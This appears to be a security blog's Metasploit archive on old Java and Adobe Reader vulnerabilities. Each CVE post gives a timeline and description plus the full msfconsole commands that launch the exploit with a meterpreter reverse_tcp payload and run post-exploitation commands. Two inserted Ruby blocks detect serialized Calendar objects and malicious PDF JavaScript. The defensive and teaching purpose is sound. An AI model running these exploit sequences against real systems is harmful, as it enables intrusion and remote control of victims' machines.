Category Archives: Metasploit

All my posts regarding the Metasploit framework, its auxiliaries, plugins and exploits.

CVE-2008-5353 : Sun Java Calendar Deserialization Exploit

Timeline :

Vulnerability reported by Sami Koivu on 2008-08-01
Vulnerability fixed by Sun on 2008-12-03
PoC provided on 2009-05-19
Metasploit PoC provided by hdm on 2009-06-16

    PoC provided by :

Sami Koivu
sf
hdm

    Reference(s) :

CVE-2008-5353

    Affected version(s) :

JRE & JDK version 6 prior to update 11
JRE & JDK version 5 prior to update 16
JRE & JDK version 1.4.2_18 and prior

    Tested on Windows XP SP3 with :

    Java 6 Standard Edition Update 10

    Description :

This module exploits a flaw in the deserialization of Calendar objects in the Sun JVM. The payload can be either a native payload which is generated as an executable and dropped/executed on the target or a shell from within the Java applet in the target browser. The affected Java versions are JDK and JRE 6 Update 10 and earlier, JDK and JRE 5.0 Update 16 and earlier, SDK and JRE 1.4.2_18 and earlier (SDK and JRE 1.3.1 are not affected).

    Commands :

use exploit/multi/browser/java_calendar_deserialize
set SRVHOST 192.168.178.21
set PAYLOAD java/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

sessions -i 1
sysinfo
getuid
ipconfig
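The module description above explains the flaw from the attacker's side: a serialized Calendar object handed to the JVM. As an added example (not code from this page or from the Metasploit module), here is the defender's side in Ruby: a subset parser for the Java Object Serialization Stream Protocol that checks the AC ED 00 05 header, lists every class descriptor a stream declares without instantiating anything, and flags a java.util.Calendar or GregorianCalendar object. The embedded sample stream is constructed for the demo: its field layout, zero serialVersionUIDs and block data are invented, and it is not the module's payload.

```ruby
require 'stringio'

# Subset parser for the Java serialization stream protocol: records every class descriptor
# and the field values of plain objects. Arrays, enums, proxy descriptors and externalizable
# objects are out of scope and raise, which for triage means "inspect this one by hand".
# Type codes and flags are from java.io.ObjectStreamConstants.
STREAM_MAGIC, STREAM_VERSION = 0xACED, 5
TC_NULL, TC_REFERENCE, TC_CLASSDESC, TC_OBJECT = 0x70, 0x71, 0x72, 0x73
TC_STRING, TC_BLOCKDATA, TC_ENDBLOCKDATA = 0x74, 0x77, 0x78
SC_WRITE_METHOD, BASE_WIRE_HANDLE = 0x01, 0x7E0000
PRIM_SIZE = { 'B' => 1, 'C' => 2, 'D' => 8, 'F' => 4, 'I' => 4, 'J' => 8, 'S' => 2, 'Z' => 1 }.freeze
class JavaSerialScanner
  def initialize(bytes)
    @io = StringIO.new(bytes.b)
    @handles, @classes = [], []   # wire handles in assignment order; class names in declaration order
  end

  # Returns { classes: [...], roots: [...] }; raises on a bad header or an unhandled type code.
  def scan
    magic, version = @io.read(4).to_s.unpack('nn')
    raise 'not a Java serialization stream (no AC ED 00 05 header)' unless magic == STREAM_MAGIC && version == STREAM_VERSION
    roots = []
    roots << read_content until @io.eof?
    { classes: @classes, roots: roots }
  end

  def u8;  @io.read(1).unpack1('C'); end
  def u16; @io.read(2).unpack1('n'); end
  def utf; @io.read(u16); end                          # length-prefixed (modified) UTF-8
  def new_handle(x); @handles << x; x; end

  def read_content
    case (tc = u8)
    when TC_OBJECT    then read_object
    when TC_STRING    then new_handle(utf)
    when TC_NULL      then nil
    when TC_REFERENCE then @handles.fetch(@io.read(4).unpack1('N') - BASE_WIRE_HANDLE)
    when TC_BLOCKDATA then @io.read(u8)                # opaque bytes written by writeObject()
    else raise format('unsupported type code 0x%02x at offset %d', tc, @io.pos - 1)
    end
  end

  def read_class_desc
    case (tc = u8)
    when TC_NULL      then nil
    when TC_REFERENCE then @handles.fetch(@io.read(4).unpack1('N') - BASE_WIRE_HANDLE)
    when TC_CLASSDESC
      desc = new_handle(name: utf, fields: [], super: nil)
      @io.read(8)                                      # serialVersionUID, irrelevant for triage
      @classes << desc[:name]
      desc[:flags] = u8
      u16.times do                                     # field descriptors
        code, name = u8.chr, utf
        read_content if code == 'L' || code == '['     # object field: its type name follows
        desc[:fields] << [code, name]
      end
      skip_annotation                                  # classAnnotation
      desc[:super] = read_class_desc
      desc
    else raise format('unexpected type code 0x%02x in class descriptor', tc)
    end
  end

  def skip_annotation                                  # contents up to TC_ENDBLOCKDATA
    until u8 == TC_ENDBLOCKDATA
      @io.seek(-1, IO::SEEK_CUR)
      read_content
    end
  end

  def read_object
    desc = read_class_desc
    obj = new_handle(class: desc[:name], values: {})
    chain, d = [], desc                                # classdata comes superclass first
    (chain.unshift(d); d = d[:super]) while d
    chain.each do |c|
      c[:fields].each { |code, name| obj[:values][name] = PRIM_SIZE[code] ? @io.read(PRIM_SIZE[code]) : read_content }
      skip_annotation if (c[:flags] & SC_WRITE_METHOD) != 0   # objectAnnotation
    end
    obj
  end
end

# Triage rule for this post: a serialized Calendar from an untrusted source is worth a closer look.
def calendar_deserialization?(classes)
  classes.any? { |c| c.match?(/\Ajava\.util\.(Gregorian)?Calendar\z/) }
end

JUTF = ->(s) { [s.bytesize].pack('n') + s }   # Java length-prefixed string
# Constructed sample, not the module's payload: field layout, zero serialVersionUIDs and block data are invented.
SAMPLE_STREAM = [
  [STREAM_MAGIC, STREAM_VERSION].pack('nn'),
  [TC_OBJECT, TC_CLASSDESC].pack('CC'), JUTF['java.util.GregorianCalendar'], "\x00" * 8,
  [0x03].pack('C'), [1].pack('n'), 'I', JUTF['year'], [TC_ENDBLOCKDATA].pack('C'),   # SC_WRITE_METHOD|SC_SERIALIZABLE, one int field, no annotation
  [TC_CLASSDESC].pack('C'), JUTF['java.util.Calendar'], "\x00" * 8,
  [0x02].pack('C'), [2].pack('n'), 'Z', JUTF['lenient'], 'L', JUTF['zone'], [TC_STRING].pack('C'), JUTF['Ljava/util/TimeZone;'],
  [TC_ENDBLOCKDATA, TC_NULL].pack('CC'),                         # no annotation, no superclass
  "\x01", [TC_NULL].pack('C'), [2008].pack('N'),                 # classdata: lenient=true, zone=null, year=2008
  [TC_BLOCKDATA, 2].pack('CC'), [0xAB, 0xCD].pack('C*'), [TC_ENDBLOCKDATA].pack('C')   # writeObject() block, then end
].join.b
```

Pointed at an applet resource captured off the wire (the module serves everything through SRVHOST) or at a file pulled from a browser cache, `JavaSerialScanner.new(bytes).scan` answers the first triage question, "is this serialized Java and which classes does it ask the JVM to build", without ever deserializing. It refuses arrays, enums and proxy descriptors on purpose; widen it only when the stream is already treated as hostile input.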

CVE-2010-3563 : Sun Java Web Start BasicServiceImpl Remote Code Execution Exploit

Timeline :

Vulnerability reported by Matthias Kaiser through ZDI to Oracle on 2010-04-05
Coordinated public release of the advisory on 2010-10-12
Metasploit PoC provided by egypt on 2010-11-19

    PoC provided by :

Matthias Kaiser
egypt

    Reference(s) :

CVE-2010-3563

    Affected version(s) :

Java 6 Standard Edition prior to update 22

    Tested on Windows XP SP3 with :

    Java 6 Standard Edition Update 10

    Description :

This module exploits a vulnerability in the Java Runtime Environment that allows an attacker to escape the Java sandbox. By injecting a parameter into the javaws call made by the BasicServiceImpl class, the default Java sandbox policy file can be overwritten. The vulnerability affects Java 6 prior to update 22. NOTE: exploiting this vulnerability causes several sinister-looking popup windows saying that Java is “Downloading application.”

    Commands :

use exploit/windows/browser/java_basicservice_impl
set SRVHOST 192.168.178.21
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

sessions -i 1
sysinfo
getuid
ipconfig

CVE-2008-2992 : Adobe Acrobat util.printf Buffer Overflow

Timeline :

Vulnerability reported by Peter Vreugdenhil to ZDI
Vulnerability reported from ZDI to the vendor on 2008-01-21
Coordinated public release on 2008-11-04
Milw0rm PoC provided by Debasis Mohanty on 2008-11-05
Metasploit PoC provided by Mario Ceballos on 2008-12-03

    PoC provided by :

MC
Didier Stevens

    Reference(s) :

CVE-2008-2992

    Affected version(s) :

Adobe Reader and Adobe Acrobat Professional prior to 8.1.3

    Tested on Windows XP SP3 with :

    Adobe Reader 8.1.2

    Description :

This module exploits a buffer overflow in Adobe Reader and Adobe Acrobat Professional prior to 8.1.3. By creating a specially crafted PDF that contains a malformed util.printf entry, an attacker may be able to execute arbitrary code.

    Commands :

use exploit/windows/fileformat/adobe_utilprintf
set OUTPUTPATH /home/eromang
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit -j

sessions -i 1
sysinfo
getuid
ipconfig

CVE-2007-5659 : Adobe Acrobat Collab.collectEmailInfo Buffer Overflow

Timeline :

Vulnerability reported by Greg MacManus to iDefense Labs
Vulnerability reported from iDefense Labs to the vendor on 2007-10-10
Adobe released version 8.1.2 on 2008-02-06
Exploit discovered in the wild on 2008-02-08
Public disclosure on 2008-02-08
Metasploit PoC provided by MC on 2009-03-28

    PoC provided by :

MC
Didier Stevens

    Reference(s) :

CVE-2007-5659
EDB-ID-11987

    Affected version(s) :

Adobe Reader and Adobe Acrobat Professional 8.1.1

    Tested on Windows XP SP3 with :

    Adobe Reader 8.1.1

    Description :

This module exploits a buffer overflow in Adobe Reader and Adobe Acrobat Professional 8.1.1. By creating a specially crafted PDF that contains a malformed Collab.collectEmailInfo() call, an attacker may be able to execute arbitrary code.

    Commands :

use exploit/windows/fileformat/adobe_collectemailinfo
set OUTPUTPATH /home/eromang
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit -j

sessions -i 1
sysinfo
getuid
ipconfig
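Both Adobe posts above (CVE-2008-2992 and CVE-2007-5659) come down to one JavaScript call hidden in a PDF, so one detector serves both. This is an added example, not code from this page or from Metasploit: a Ruby scanner that walks the file object by object, pulls JavaScript out of /JS literal strings and out of stream objects (inflating /FlateDecode streams and tolerating truncated ones), and reports which object calls util.printf or Collab.collectEmailInfo. It goes a little beyond the two modules in that any /JS carrier is extracted, whatever it contains. The sample PDF is built inside the block with benign calls to the two APIs; its object layout is invented for the demo and is not what the modules generate.

```ruby
require 'zlib'

# JavaScript APIs whose presence points at the two fileformat modules above.
INDICATORS = { 'util.printf' => 'CVE-2008-2992', 'Collab.collectEmailInfo' => 'CVE-2007-5659' }.freeze

OBJECT     = /(\d+)\s+\d+\s+obj\b(.*?)endobj/m                   # "N G obj ... endobj"
STREAM     = /stream\r?\n(.*?)\r?\nendstream/m                   # raw stream body
JS_LITERAL = /\/JS\s*(?<s>\((?:[^()\\]|\\.|\g<s>)*\))/m          # /JS (...) with balanced parens

# Streaming inflate returns whatever a truncated stream yields; if the bytes are not
# deflated at all (wrong /Filter, damaged file) fall back to scanning them raw.
def inflate(data)
  Zlib::Inflate.new.inflate(data)
rescue Zlib::Error
  data
end

# Every JavaScript carrier in the file as [object number, script text].
def extract_js_bodies(pdf)
  bodies = []
  pdf.b.scan(OBJECT) do |num, body|
    body.scan(JS_LITERAL) { |(lit)| bodies << [num.to_i, lit[1..-2]] }
    next unless (m = body.match(STREAM))
    data = m[1]
    data = inflate(data) if body[0...m.begin(0)].include?('/FlateDecode')
    bodies << [num.to_i, data]
  end
  bodies
end

# One hit per (object, API) pair: { object:, api:, cve: }.
def scan_pdf(pdf)
  extract_js_bodies(pdf).flat_map do |obj, js|
    INDICATORS.select { |api, _| js.include?(api) }.map { |api, cve| { object: obj, api: api, cve: cve } }
  end
end

# Constructed sample, not a module output: object 5 carries JavaScript in a FlateDecode
# stream reached via /OpenAction; object 6 carries an inline /JS string via a page action.
def build_sample_pdf(stream_js, literal_js)
  deflated = Zlib::Deflate.deflate(stream_js)
  [
    '%PDF-1.4',
    '1 0 obj << /Type /Catalog /Pages 2 0 R /OpenAction 4 0 R >> endobj',
    '2 0 obj << /Type /Pages /Kids [3 0 R] /Count 1 >> endobj',
    '3 0 obj << /Type /Page /Parent 2 0 R /AA << /O 6 0 R >> >> endobj',
    '4 0 obj << /S /JavaScript /JS 5 0 R >> endobj',
    "5 0 obj << /Length #{deflated.bytesize} /Filter /FlateDecode >>",
    'stream', deflated, 'endstream', 'endobj',
    "6 0 obj << /S /JavaScript /JS (#{literal_js}) >> endobj",
    'trailer << /Root 1 0 R >>'
  ].join("\n").b
end
```

The rule is pdfid-style: it keys on the API names, not on the malformed arguments, so it also fires on a legitimate form that calls util.printf; treat a hit as "open this one in a sandbox", not as a verdict. It misses JavaScript that assembles the call at runtime (string splitting, eval, unescape), which is the obvious evasion; for those, feed the extracted stream to a JavaScript emulator instead of a substring search.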